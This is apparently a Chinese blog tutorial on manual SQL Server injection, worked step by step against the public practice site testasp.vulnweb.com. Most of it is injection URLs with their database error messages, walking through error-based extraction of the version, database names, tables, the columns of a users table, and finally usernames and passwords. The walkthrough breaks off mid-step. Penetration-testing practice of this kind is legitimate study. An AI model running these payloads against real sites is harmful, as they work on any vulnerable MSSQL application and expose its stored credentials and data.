zoukankan      html  css  js  c++  java

  • sql server手工注入

    sql server手工注入

    测试网站testasp.vulnweb.com

    1.

    http://testasp.vulnweb.com/showforum.asp?id=0

    http://testasp.vulnweb.com/showforum.asp?id=0'

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2

    2.数据库版本

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)

    3.数据库名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())

    4.第一个数据库

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)

    返回Conversion failed when converting the nvarchar value 'acublog' to data type int

    5.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')

    返回Conversion failed when converting the nvarchar value 'acuforum' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')

    返回Conversion failed when converting the nvarchar value 'acuservice' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    那就这几个数据库了

    6.获取表名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')

    返回Conversion failed when converting the nvarchar value 'threads' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')

    返回Conversion failed when converting the nvarchar value 'users' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')

    返回Conversion failed when converting the nvarchar value 'forums' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')

    返回Conversion failed when converting the nvarchar value 'posts' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    7.users的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))

    返回Conversion failed when converting the nvarchar value 'uname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')

    返回Conversion failed when converting the nvarchar value 'upass' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')

    返回Conversion failed when converting the nvarchar value 'email' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')

    返回Conversion failed when converting the nvarchar value 'realname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')

    返回Conversion failed when converting the nvarchar value 'avatar' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    forums的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))

    8.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)

    返回Conversion failed when converting the nvarchar value '--' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)

    返回Conversion failed when converting the nvarchar value 'none' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname  from users where id =2)

    返回
  • 相关阅读:
    leetcode刷题-- 4. 贪心
    golang 中的引号
    记录博客的目的
    java返回树形结构的正确姿势
    java -jar xxxx.jar --server.port(指定启动端口无效)
    Spring 中@NotNull, @NotEmpty和@NotBlank之间的区别是什么?
    IntelliJ IDEA远程连接linux,一键上传jar包
    linux 运行Jar包时指定启动端口
    @Validated注解对单个实体类与List集合的验证
    linux -bash: ./startup.sh: /bin/sh^M: 坏的解释器: 没有那个文件或目录
  • 原文地址:https://www.cnblogs.com/nightnine/p/5479900.html
Copyright © 2011-2022 走看看